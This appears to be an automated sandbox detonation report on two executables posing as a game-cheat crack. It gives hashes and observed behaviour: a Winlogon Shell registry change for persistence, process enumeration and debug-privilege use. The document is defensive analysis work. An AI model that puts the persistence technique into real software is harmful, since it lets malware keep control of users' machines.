C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 55baacecb7ed96337ccd5cdfd425cfb8
SHA1 7a40d743a398da8d9a82552add7cf8ed18eced1a
SHA256 a12eb809f22787c2ea9579cefe9fef3678b68e03e921b135a80447da61efd1d3
SHA512 6f7e19c178ec69cdee110d61d4ac0f4cc086ef7ee014709348a267952f5085a54f4cd5c16fc088a7ba231d0ca3381136e7d58ab6ce44ab0a32807cf4d6fb5431

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-06 21:36

Reported

2024-10-06 21:39

Platform

win10v2004-20240802-en

Max time kernel

95s

Max time network

96s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe"

Signatures

Modifies WinLogon for persistence

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" | C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe"

Network


Files


Analysis: behavioral1

Detonation Overview

Submitted

2024-10-06 21:36

Reported

2024-10-06 21:39

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" | C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe"

Network


Files
